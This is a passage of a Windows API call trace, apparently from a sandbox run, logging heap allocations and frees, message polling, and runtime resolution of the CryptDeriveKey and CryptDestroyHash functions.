lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0139.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0139.767] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDeriveKey") returned 0x75712c90 [0139.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0139.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0139.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a08 [0139.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0139.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0139.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0139.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0139.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0139.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0139.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0139.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0139.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0139.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0139.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0139.768] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa86f90, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa87350) returned 1 [0139.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0139.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0139.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0139.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0139.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0139.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0139.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0139.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0139.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0139.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0139.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0139.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0139.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0139.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0139.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0139.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0139.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0139.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0139.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0139.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0139.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0139.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0139.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0139.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0139.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0139.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0139.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0139.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0139.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0139.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0139.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0139.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0139.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0139.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0139.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0139.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0139.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0139.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0139.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0139.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0139.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0139.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0139.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0139.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0139.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0139.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0139.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0139.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0139.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0139.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0139.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0139.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0139.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0139.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0139.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0139.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0139.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0139.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0139.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0139.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0139.770] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0139.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0139.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0139.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0139.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0139.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0139.771] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0139.771] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0139.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0139.771] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0139.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0139.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0139.771] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0139.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0139.771] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0139.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0139.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0139.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0139.771] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0139.771] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0139.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0139.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0139.772] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0139.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0139.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0139.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0139.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0139.772] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0139.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11) returned 0x2e69a88 [0139.772] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e69a88, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0139.773] CryptDestroyHash (hHash=0xa86f90) returned 1 [0139.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0139.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0139.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0139.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0139.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0139.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0139.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0139.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0139.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0139.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0139.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0139.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0139.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0139.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0139.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0139.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0139.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0139.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0139.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0139.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0139.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0139.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0139.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0139.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0139.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0139.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0139.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0139.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0139.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0139.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0139.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0139.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0139.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0139.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0139.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0139.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0139.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0139.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0139.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0139.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0139.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0139.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0139.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0139.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0139.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0139.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0139.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0139.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0139.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0139.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0139.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0139.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0139.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0139.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0139.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0139.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0139.776] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0139.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0139.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0139.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0139.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0139.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0139.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0139.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0139.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0139.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0139.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0139.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0139.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0139.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0139.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0139.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0139.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0139.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0139.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0139.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0139.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977998 | out: hHeap=0x970000) returned 1 [0139.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0139.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0139.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0139.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0139.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0139.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0139.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0139.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0139.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0139.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0139.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0139.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0139.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0139.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0139.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0139.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0139.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0139.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0139.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0139.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0139.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0139.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0139.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0139.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0139.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0139.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0139.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0139.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0139.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0139.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0139.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0139.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0139.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0139.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0139.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0139.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0139.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0139.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0139.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0139.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0139.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0139.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0139.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0139.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0139.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0139.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0139.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0139.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0139.902] HeapFree 